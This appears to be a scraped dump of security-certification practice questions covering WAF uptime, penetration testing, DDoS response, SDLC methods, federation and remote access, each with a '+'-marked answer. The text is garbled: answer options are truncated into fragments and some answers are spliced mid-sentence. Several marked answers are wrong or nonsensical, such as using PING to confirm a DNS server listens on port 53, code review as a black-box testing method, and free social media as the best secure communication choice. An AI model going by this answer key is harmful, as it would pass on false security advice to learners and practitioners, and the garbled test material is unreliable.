There have been some failures of the company’s internal facing website. A security engineer has|found the WAF to be the root cause of the failures. System logs show that the WAF has been|unavailable for 14 hours over the past month, in four separate situations. One of these situations|was a two hour scheduled maintenance time, aimed at improving the stability of the WA+Using|the MTTR based on the last month’s performance figures, which of the following calculations is|the percentage of uptime assuming there were 722 hours in the month?|+92.24 percent

A security firm is writing a response to an RFP from a customer that is building a new network|based software product. The firm’s expertise is in penetration testing corporate networks. The|RFP explicitly calls for all possible behaviors of the product to be tested, however, it does not|specify any particular method to achieve this goal. Which of the following should be used to|ensure the security and functionality of the product? (Select TWO).|+Code review

Company XYZ has purchased and is now deploying a new HTML5 application. The company|wants to hire a penetration tester to evaluate the security of the client and server components of|the proprietary web application before launch. Which of the following is the penetration tester|MOST likely to use while performing black box testing of the security of the company’s purchased|application? (Select TWO).|+Code review

The Information Security Officer (ISO) believes that the company has been targeted by|cybercriminals and it is under a cyber attack. Internal services that are normally available to the|public via the Internet are inaccessible, and employees in the office are unable to browse the|Internet. The senior security engineer starts by reviewing the bandwidth at the border router, and|notices that the incoming bandwidth on the router’s external interface is maxed out. The security|engineer then inspects the following piece of log to try and determine the reason for the downtime,|focusing on the company’s external router’s IP which is 128.20.176.19:|11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 1400| 11:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 1400| 11:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400| 11:16:22.110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 1400| 11:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400|Which of the following describes the findings the senior security engineer should report to the ISO|and the BEST solution for service restoration?|company’s ISP should be contacted and instructed to block the malicious packets.|filter should be enabled to block the attack and restore communication.|sinkhole should be configured to drop traffic at the source networks.|should be placed on the company’s external router to block incoming UDP port 19 traffic.|+After the senior engineer used a network analyzer to identify an active Fraggle attack, the

An external penetration tester compromised one of the client organization’s authentication servers|and retrieved the password database. Which of the following methods allows the penetration|tester to MOST efficiently use any obtained administrative credentials on the client organization’s|other systems, without impacting the integrity of any of the systems?|+Use the pass the hash technique

A web services company is planning a one-time high-profile event to be hosted on the corporate|website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive|Officer (CEO), has requested that his security engineers put temporary preventive controls in|place. Which of the following would MOST appropriately address Joe's concerns?|sessions.|+Ensure web services hosting the event use TCP cookies and deny_hosts.

The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the|company’s contribution to worldwide Distributed Denial of Service (DDoS) attacks. Which of the|following should the ISP implement? (Select TWO).|+Block traffic from the ISP’s networks destined for blacklisted IPs.

Due to compliance regulations, a company requires a yearly penetration test. The Chief|Information Security Officer (CISO) has asked that it be done under a black box methodology.|Which of the following would be the advantage of conducting this kind of penetration test?|to focus on.|weakness.|+The risk of unplanned server outages is reduced.

Ann, a systems engineer, is working to identify an unknown node on the corporate network. To|begin her investigative work, she runs the following nmap command string:|user@hostname:~$ sudo nmap –O 192.168.1.54| Based on the output, nmap is unable to identify the OS running on the node, but the following|ports are open on the device:|TCP/22|TCP/111|TCP/512-514|TCP/2049|TCP/32778|Based on this information, which of the following operating systems is MOST likely running on the|unknown node?|+Linux

A security engineer is responsible for monitoring company applications for known vulnerabilities.|Which of the following is a way to stay current on exploits and information security news?|+Update company policies and procedures

The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the|country for the sales staff to generate business. The company needs an effective communication|solution to remain in constant contact with each other, while maintaining a secure business|environment. A junior-level administrator suggests that the company and the sales staff stay|connected via free social media. Which of the following decisions is BEST for the CEO to make?|applications.|+Social media is an effective solution because it is easily adaptable to new situations.

News outlets are beginning to report on a number of retail establishments that are experiencing|payment card data breaches. The data exfiltration is enabled by malware on a compromised|computer. After the initial exploit, network mapping and fingerprinting is conducted to prepare for|further exploitation. Which of the following is the MOST effective solution to protect against|unrecognized malware infections?|technology.|more effective monitoring.|advanced malware detection.|+Remove local admin permissions from all users and change anti-virus to a cloud aware, push

A security administrator notices a recent increase in workstations becoming compromised by|malware. Often, the malware is delivered via drive-by downloads, from malware hosting websites,|and is not being detected by the corporate antivirus. Which of the following solutions would|provide the BEST protection for the company?|infections.|network.|+Increase the frequency of antivirus downloads and install updates to all workstations.

A security administrator wants to calculate the ROI of a security design which includes the|purchase of new equipment. The equipment costs $50,000 and it will take 50 hours to install and|configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do|the installation. Given that the new design and equipment will allow the company to increase|revenue and make an additional $100,000 on the first year, which of the following is the ROI|expressed as a percentage for the first year?|+-45 percent

A new internal network segmentation solution will be implemented into the enterprise that consists|of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three|changes to deploy a new application onto the network before it is operational. Security now has a|significant effect on overall availability. Which of the following would be the FIRST process to|perform as a result of these findings?|could be met by another solution. Reuse the firewall infrastructure on other projects.|understood by the business owners around the availability issues. Decrease the current SLA|expectations to match the new solution.|project did not meet the security requirements. As part of the review ask them to review the control|effectiveness.|Determine if the requirements can be met with a simpler solution.|+Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution

A Chief Financial Officer (CFO) has raised concerns with the Chief Information Security Officer|(CISO) because money has been spent on IT security infrastructure, but corporate assets are still|found to be vulnerable. The business recently funded a patch management product and SOE|hardening initiative. A third party auditor reported findings against the business because some|systems were missing patches. Which of the following statements BEST describes this situation?|been given patch management and SOE hardening products.|servers and the remediation takes time to complete.|them instead of the CFO.|stakeholders and managed accordingly.|+The CFO is at fault because they are responsible for patching the systems and have already

The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP|tabletop exercise. The Chief Information Officer (CIO) wants to determine which additional|controls must be implemented to reduce the risk of an extended customer service outage due to|the VoIP system being unavailable. Which of the following BEST describes the scenario presented|and the document the ISO is reviewing?|BIA.|RA.|redundancy within the RFQ.|system within the AAR.|+The ISO is evaluating the business implications of a recent telephone system failure within the

Which of the following activities is commonly deemed “OUT OF SCOPE” when undertaking a|penetration test?|+Test password complexity of all login fields and input validation of form fields

A company is in the process of implementing a new front end user interface for its customers, the|goal is to provide them with more self service functionality. The application has been written by|developers over the last six months and the project is currently in the test phase.| Which of the following security activities should be implemented as part of the SDL in order to|provide the MOST security coverage over the solution? (Select TWO).|+Perform unit testing of the binary code

A new web based application has been developed and deployed in production. A security|engineer decides to use an HTTP interceptor for testing the application. Which of the following|problems would MOST likely be uncovered by this tool?|+The tool could show that input validation was only enabled on the client side

A security consultant is conducting a network assessment and wishes to discover any legacy|backup Internet connections the network may have. Where would the consultant find this|information and why would it be valuable?|connections typically do not have perimeter protection as strong as the primary connection.|backup connections typically do not require VPN access to the network.|backup connections typically have much lower latency than primary connections.|backup DNS servers typically allow recursive queries from Internet hosts.|+This information can be found in global routing tables, and is valuable because backup

A network administrator with a company’s NSP has received a CERT alert for targeted adversarial|behavior at the company. In addition to the company’s physical security, which of the following can|the network administrator use to detect the presence of a malicious actor physically accessing the|company’s network or information systems from within? (Select TWO).|+RAS

The security engineer receives an incident ticket from the helpdesk stating that DNS lookup|requests are no longer working from the office. The network team has ensured that Layer 2 and|Layer 3 connectivity are working. Which of the following tools would a security engineer use to|make sure the DNS server is listening on port 53?|+PING

A human resources manager at a software development company has been tasked with recruiting|personnel for a new cyber defense division in the company. This division will require personnel to|have high technology skills and industry certifications. Which of the following is the BEST method|for this manager to gain insight into this industry to execute the task?|jobs|requirements|+Interview candidates, attend training, and hire a staffing company that specializes in technology

The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day|exploits. The CISO is concerned that an unrecognized threat could compromise corporate data|and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with|split staff/guest wireless functionality. Which of the following equipment MUST be deployed to|guard against unknown threats?|updates.|VDI for all client computing needs.|perimeter firewall ACLs.|+Cloud-based antivirus solution, running as local admin, with push technology for definition

A small company’s Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to|improve the company’s security posture quickly with regard to targeted attacks. Which of the|following should the CSO conduct FIRST?|Topic 4, Integration of Computing, Communications and Business Disciplines|+Survey threat feeds from services inside the same industry.

A security engineer is working on a large software development project. As part of the design of|the project, various stakeholder requirements were gathered and decomposed to an|implementable and testable level. Various security requirements were also documented. Organize|the following security requirements into the correct hierarchy required for an SRTM.| Requirement 1: The system shall provide confidentiality for data in transit and data at rest.| Requirement 2: The system shall use SSL, SSH, or SCP for all data transport.| Requirement 3: The system shall implement a file-level encryption scheme.| Requirement 4: The system shall provide integrity for all data at rest.| Requirement 5: The system shall perform CRC checks on all files.|3:|Requirement 3 under 2|+Level 1: Requirements 1 and 4; Level 2: Requirements 2, 3, and 5

A mature organization with legacy information systems has incorporated numerous new|processes and dependencies to manage security as its networks and infrastructure are|modernized. The Chief Information Office has become increasingly frustrated with frequent|releases, stating that the organization needs everything to work completely, and the vendor should|already have those desires built into the software product. The vendor has been in constant|communication with personnel and groups within the organization to understand its business|process and capture new software requirements from users. Which of the following methods of|software development is this organization’s configuration management process using?|+Agile

A security engineer is a new member to a configuration board at the request of management. The|company has two new major IT projects starting this year and wants to plan security into the|application deployment. The board is primarily concerned with the applications’ compliance with|federal assessment and authorization standards. The security engineer asks for a timeline to|determine when a security assessment of both applications should occur and does not attend|subsequent configuration board meetings. If the security engineer is only going to perform a|security assessment, which of the following steps in system authorization has the security|engineer omitted?|+Establish the security control baseline

An analyst connects to a company web conference hosted on|www.webconference.com/meetingID#01234 and observes that numerous guests have been|allowed to join, without providing identifying information. The topics covered during the web|conference are considered proprietary to the company. Which of the following security concerns|does the analyst present to management?|+Guest users could present a risk to the integrity of the company’s information

During a recent audit of servers, a company discovered that a network administrator, who required|remote access, had deployed an unauthorized remote access application that communicated over|common ports already allowed through the firewall. A network scan showed that this remote|access application had already been installed on one third of the servers in the company. Which of|the following is the MOST appropriate action that the company should take to provide a more|appropriate solution?|+Implement an IPS to block the application on the network

A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The|core of the POS is an extranet site, accessible only from retail stores and the corporate office over|a split-tunnel VP+An additional split-tunnel VPN provides bi-directional connectivity back to the|main office, which provides voice connectivity for store VoIP phones. Each store offers guest|wireless functionality, as well as employee wireless. Only the staff wireless network has access to|the POS VP+Recently, stores are reporting poor response times when accessing the POS|application from store computers as well as degraded voice quality when making phone calls.|Upon investigation, it is determined that three store PCs are hosting malware, which is generating|excessive network traffic. After malware removal, the information security department is asked to|review the configuration and suggest changes to prevent this from happening again. Which of the|following denotes the BEST way to mitigate future malware risk?|solution.|+Deploy new perimeter firewalls at all stores with UTM functionality.

Executive management is asking for a new manufacturing control and workflow automation|solution. This application will facilitate management of proprietary information and closely guarded|corporate trade secrets.| The information security team has been a part of the department meetings and come away with|the following notes:| -Human resources would like complete access to employee data stored in the application. They|would like automated data interchange with the employee management application, a cloud-based|SaaS application.| -Sales is asking for easy order tracking to facilitate feedback to customers.| -Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with|data ownership questions and legal jurisdiction.| -Manufacturing is asking for ease of use. Employees working the assembly line cannot be|bothered with additional steps or overhead. System interaction needs to be quick and easy.| -Quality assurance is concerned about managing the end product and tracking overall|performance of the product being produced. They would like read-only access to the entire|workflow process for monitoring and baselining.| The favored solution is a user friendly software application that would be hosted onsite. It has|extensive ACL functionality, but also has readily available APIs for extensibility. It supports|readonly access, kiosk automation, custom fields, and data encryption.|Which of the following departments’ request is in contrast to the favored solution?|+Manufacturing

The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve|company employees who call with computer-related problems. The helpdesk staff is currently|unable to perform effective troubleshooting and relies on callers to describe their technology|problems. Given that the helpdesk staff is located within the company headquarters and 90% of|the callers are telecommuters, which of the following tools should the helpdesk manager use to|make the staff more effective at troubleshooting while at the same time reducing company costs?|(Select TWO).|+Web cameras

An intruder was recently discovered inside the data center, a highly sensitive area. To gain|access, the intruder circumvented numerous layers of physical and electronic security measures.|Company leadership has asked for a thorough review of physical security controls to prevent this|from happening again. Which of the following departments are the MOST heavily invested in|rectifying the problem? (Select THREE).|+Facilities management

A completely new class of web-based vulnerabilities has been discovered. Claims have been|made that all common web-based development frameworks are susceptible to attack. Proofofconcept|details have emerged on the Internet. A security advisor within a company has been|asked to provide recommendations on how to respond quickly to these vulnerabilities. Which of|the following BEST describes how the security advisor should respond?|data. Attempt to exploit via the proof-of-concept code. Consider remediation options.|servers. Advise management of any ‘high’ or ‘critical’ penetration test findings and put forward|recommendations for mitigation.|recommendation to wait until the news has been independently verified by software vendors|providing the web application software.|“maintenance mode” until the vulnerability can be reliably mitigated through a vendor patch.|+Assess the reliability of the information source, likelihood of exploitability, and impact to hosted

A company sales manager received a memo from the company’s financial department which|stated that the company would not be putting its software products through the same security|testing as previous years to reduce the research and development cost by 20 percent for the|upcoming year. The memo also stated that the marketing material and service level agreement for|each product would remain unchanged. The sales manager has reviewed the sales goals for the|upcoming year and identified an increased target across the software products that will be affected|by the financial department’s change. All software products will continue to go through new|development in the coming year. Which of the following should the sales manager do to ensure|the company stays out of trouble?|+Discuss the issue with the software product's user groups

A member of the software development team has requested advice from the security team to|implement a new secure lab for testing malware. Which of the following is the NEXT step that the|security team should take?|+Purchase new hardware to keep the malware isolated.

A company has issued a new mobile device policy permitting BYOD and company-issued devices.|The company-issued device has a managed middleware client that restricts the applications|allowed on company devices and provides those that are approved. The middleware client|provides configuration standardization for both company owned and BYOD to secure data and|communication to the device according to industry best practices. The policy states that, “BYOD|clients must meet the company’s infrastructure requirements to permit a connection.” The|company also issues a memorandum separate from the policy, which provides instructions for the|purchase, installation, and use of the middleware client on BYO+Which of the following is being|described?|+Asset management

A security engineer on a large enterprise network needs to schedule maintenance within a fixed|window of time. A total outage period of four hours is permitted for servers. Workstations can|undergo maintenance from 8:00 pm to 6:00 am daily. Which of the following can specify|parameters for the maintenance work? (Select TWO).|+Managed security service

An organization has decided to reduce labor costs by outsourcing back office processing of credit|applications to a provider located in another country. Data sovereignty and privacy concerns|raised by the security team resulted in the third-party provider only accessing and processing the|data via remote desktop sessions. To facilitate communications and improve productivity, staff at|the third party has been provided with corporate email accounts that are only accessible via the|remote desktop sessions. Email forwarding is blocked and staff at the third party can only|communicate with staff within the organization. Which of the following additional controls should|be implemented to prevent data loss? (Select THREE).|+Implement hashing of data in transit

A company has received the contract to begin developing a new suite of software tools to replace|an aging collaboration solution. The original collaboration solution has been in place for nine|years, contains over a million lines of code, and took over two years to develop originally. The|SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk|analysis before moving on to the next phase. Which of the following software development|methods is MOST applicable?|+Spiral model

An attacker attempts to create a DoS event against the VoIP system of a company. The attacker|uses a tool to flood the network with a large number of SIP INVITE traffic. Which of the following|would be LEAST likely to thwart such an attack?|+Install IDS/IPS systems on the network

The helpdesk department desires to roll out a remote support application for internal use on all|company computers. This tool should allow remote desktop sharing, system log gathering, chat,|hardware logging, inventory management, and remote registry access. The risk management|team has been asked to review vendor responses to the RF+Which of the following questions is|the MOST important?|+What are the protections against MITM?

A software development manager is taking over an existing software development project. The|team currently suffers from poor communication due to a long delay between requirements|documentation and feature delivery. This gap is resulting in an above average number of|securityrelated bugs making it into production. Which of the following development methodologies|is the team MOST likely using now?|+Agile

A security manager has received the following email from the Chief Financial Officer (CFO):| “While I am concerned about the security of the proprietary financial data in our ERP application,|we have had a lot of turnover in the accounting group and I am having a difficult time meeting our|monthly performance targets. As things currently stand, we do not allow employees to work from|home but this is something I am willing to allow so we can get back on track. What should we do|first to securely enable this capability for my group?”|Based on the information provided, which of the following would be the MOST appropriate|response to the CFO?|allowed.|home.|users working from home.|access.|Topic 5, Technical Integration of Enterprise Components|+Remote access to the ERP tool introduces additional security vulnerabilities and should not be

Three companies want to allow their employees to seamlessly connect to each other’s wireless|corporate networks while keeping one consistent wireless client configuration. Each company|wants to maintain its own authentication infrastructure and wants to ensure that an employee who|is visiting the other two companies is authenticated by the home office when connecting to the|other companies’ wireless network. All three companies have agreed to standardize on 802.1x|EAP-PEAP-MSCHAPv2 for client configuration. Which of the following should the three|companies implement?|system which implements trust delegation.|to an LDAP backend and agree on a single SSID.|the same CA when issuing client certificates.|based wireless controller.|+The three companies should agree on a single SSID and configure a hierarchical RADIUS

Company XYZ provides cable television service to several regional areas. They are currently|installing fiber-to-the-home in many areas with hopes of also providing telephone and Internet|services. The telephone and Internet services portions of the company will each be separate|subsidiaries of the parent company. The board of directors wishes to keep the subsidiaries|separate from the parent company. However all three companies must share customer data for|the purposes of accounting, billing, and customer authentication. The solution must use open|standards, and be simple and seamless for customers, while only sharing minimal data between|the companies. Which of the following solutions is BEST suited for this scenario?|becoming an IdP.|becoming an SSP.|becoming an SP.|becoming an IdP.|+The companies should federate, with the parent becoming the SP, and the subsidiaries

Company A needs to export sensitive data from its financial system to company B’s database,|using company B’s API in an automated manner. Company A’s policy prohibits the use of any|intermediary external systems to transfer or store its sensitive data, therefore the transfer must|occur directly between company A’s financial system and company B’s destination server using|the supplied AP+Additionally, company A’s legacy financial software does not support encryption,|while company B’s API supports encryption. Which of the following will provide end-to-end|encryption for the data transfer while adhering to these requirements?|data.|+Company A must install an SSL tunneling software on the financial system.

A security company is developing a new cloud-based log analytics platform. Its purpose is to|allow:| Customers to upload their log files to the “big data” platform| Customers to perform remote log search| Customers to integrate into the platform using an API so that third party business intelligence|tools can be used for the purpose of trending, insights, and/or discovery|Which of the following are the BEST security considerations to protect data from one customer|being disclosed to other customers? (Select THREE).|+Secure storage and transmission of API keys